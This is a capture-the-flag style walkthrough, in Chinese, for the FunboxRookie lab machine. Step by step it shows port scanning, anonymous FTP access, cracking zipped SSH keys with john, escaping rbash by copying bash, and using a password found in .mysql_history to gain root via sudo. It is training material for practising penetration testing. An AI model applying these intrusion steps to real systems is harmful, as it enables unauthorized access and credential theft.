【offensive-security】5.FunboxRookie靶机
一、获取靶机信息
1.已知信息:
- IP: 192.168.245.107
2.获取信息:
- nmap扫描开启的服务
┌──(lo0p㉿0xlo0p)-[~]
└─$ nmap -p "*" 192.168.245.107
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 10:53 CST
Nmap scan report for 192.168.245.107
Host is up (0.27s latency).
Not shown: 8348 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 401.07 seconds
分别开了21、22、80端口,首先进入80端口查看,是一个apache默认页面,没有什么有用的信息
3.FTP弱密码
使用匿名账号进入ftp,可以发现一堆压缩包,全部下载下来,解压过程中发现需要密码
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ ftp 192.168.245.107
Connected to 192.168.245.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.245.107]
Name (192.168.245.107:lo0p): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user [email protected] !
230-
230-The local time is: Thu Oct 27 03:22:03 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to .
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47501|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp> quit
221 Goodbye.
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ unzip -o anna.zip
Archive: anna.zip
[anna.zip] id_rsa password:
skipping: id_rsa incorrect password
4.zip2john、john工具爆破压缩包密码
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ zip2john *.zip > pwd2.txt
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 ariel.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 bud.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 cathrine.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 homer.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 jessica.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 john.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 marge.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 miriam.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 zlatan.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ john pwd2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
iubire (tom.zip/id_rsa)
1g 0:00:00:00 DONE 2/3 (2022-10-27 02:25) 33.33g/s 1563Kp/s 1563Kc/s 1563KC/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到tom的压缩包密码:iubire,解压拿到id_rsa文件,利用该文件免密进入ssh
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ unzip tom.zip
Archive: tom.zip
[tom.zip] id_rsa password:
inflating: id_rsa
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ chmod 600 id_rsa
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.245.107 (192.168.245.107)' can't be established.
ED25519 key fingerprint is SHA256:ZBER3N78DusT56jsi/IGcAxcCB2W5CZWUJTbc3K4bZc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.245.107' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-117-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Oct 27 03:34:44 UTC 2022
System load: 0.0 Processes: 172
Usage of /: 74.9% of 4.37GB Users logged in: 0
Memory usage: 38% IP address for ens256: 192.168.245.107
Swap usage: 0%
30 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
tom@funbox2:~$ find / -perm -4000 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
tom@funbox2:~$ sudo -l
[sudo] password for tom:
tom@funbox2:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom:/home/tom:/bin/rbash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
发现tom用户的shell为rbash,大部分命令都被限制了
5. rbash逃逸
参考: (71条消息) 【渗透测试】--- rbash逃逸方法简述_通地塔的博客-CSDN博客
这里发现cp命令可以执行,我们将/bin/bash复制出来然后执行
tom@funbox2:~$ cp /bin/bash .
tom@funbox2:~$ bash
逃逸了,然后开始获取相关可利用的信息,用户目录下可查看.bash_history等信息
tom@funbox2:~$ ll
total 1148
drwxr-xr-x 5 tom tom 4096 Oct 27 06:32 ./
drwxr-xr-x 3 root root 4096 Jul 25 2020 ../
-rwxr-xr-x 1 tom tom 1113504 Oct 27 06:32 bash*
-rw------- 1 tom tom 72 Oct 27 06:32 .bash_history
-rw-r--r-- 1 tom tom 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 tom tom 3771 Apr 4 2018 .bashrc
drwx------ 2 tom tom 4096 Oct 27 03:34 .cache/
drwx------ 3 tom tom 4096 Jul 25 2020 .gnupg/
-rw------- 1 tom tom 12288 Oct 27 03:36 .local..swp
-rw-r--r-- 1 tom tom 33 Oct 27 02:49 local.txt
-rw------- 1 tom tom 295 Jul 25 2020 .mysql_history
-rw-r--r-- 1 tom tom 807 Apr 4 2018 .profile
drwx------ 2 tom tom 4096 Jul 25 2020 .ssh/
-rw-r--r-- 1 tom tom 0 Oct 27 03:41 .sudo_as_admin_successful
-rw------- 1 tom tom 728 Oct 27 03:40 .viminfo
tom@funbox2:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
看到有个.mysql_history很可疑,vim查看有一个insert命令插入tom用户xx11yy22!密码,我们抱着试一试的态度拿这个密码来sudo
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
竟然成功了,权限解析如下:
第一段:表示来源地,即从哪执行这条命令。ALL表示所有计算机
第二段:表示sudo可以切换到什么用户。ALL表示所有用户
第三段:表示sudo可以切换到哪些组下的用户。ALL表示所有组
结果直接su root就可以拿到了root用户权限。。。这题出得太水了
tom@funbox2:~$ sudo su
root@funbox2:/home/tom#